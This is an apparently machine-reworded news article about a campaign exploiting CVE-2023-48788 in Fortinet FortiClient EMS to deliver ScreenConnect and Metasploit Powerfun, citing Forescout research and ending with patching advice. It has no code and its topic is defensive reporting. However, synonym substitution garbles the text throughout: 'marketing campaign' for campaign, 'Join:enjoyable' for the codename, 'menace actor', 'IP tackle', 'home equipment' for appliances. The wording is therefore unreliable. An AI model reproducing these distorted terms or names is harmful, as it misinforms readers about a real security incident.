Cybersecurity researchers have found a brand new marketing campaign that is exploiting a just lately disclosed safety flaw in Fortinet FortiClient EMS units to ship ScreenConnect and Metasploit Powerfun payloads.
The exercise entails the exploitation of CVE-2023-48788 (CVSS rating: 9.3), a essential SQL injection flaw that might allow an unauthenticated attacker to execute unauthorized code or instructions through particularly crafted requests.
Cybersecurity agency Forescout is monitoring the marketing campaign below the codename Join:enjoyable owing to using ScreenConnect and Powerfun for post-exploitation.
The intrusion, which focused an unnamed media firm that had its weak FortiClient EMS machine uncovered to the web, came about shortly after the launch of a proof-of-concept (PoC) exploit for the flaw on March 21, 2024.
Over the subsequent couple of days, the unknown adversary was noticed leveraging the flaw to unsuccessfully obtain ScreenConnect after which set up the distant desktop software program utilizing the msiexec utility.
Nonetheless, on March 25, the PoC exploit was used to launch PowerShell code that downloaded Metasploit’s Powerfun script and initiated a reverse connection to a different IP tackle.
Additionally detected had been SQL statements designed to obtain ScreenConnect from a distant area (“ursketz[.]com”) utilizing certutil, which was then put in through msiexec earlier than establishing connections with a command-and-control (C2) server.
There’s proof to counsel that the menace actor behind it has been lively since no less than 2022, particularly singling out Fortinet home equipment and utilizing Vietnamese and German languages of their infrastructure.
“The noticed exercise clearly has a handbook part evidenced by all of the failed makes an attempt to obtain and set up instruments, in addition to the comparatively very long time taken between makes an attempt,” safety researcher Sai Molige mentioned.
“That is proof that this exercise is a part of a selected marketing campaign, moderately than an exploit included in automated cybercriminal botnets. From our observations, it seems that the actors behind this marketing campaign are usually not mass scanning however selecting goal environments which have VPN home equipment.”
Forescout mentioned the assault shares tactical and infrastructure overlaps with different incidents documented by Palo Alto Networks Unit 42 and Blumira in March 2024 that contain the abuse of CVE-2023-48788 to obtain ScreenConnect and Atera.
Organizations are really useful to use patches offered by Fortinet to deal with potential threats, monitor for suspicious visitors, and use an online utility firewall (WAF) to dam probably malicious requests.
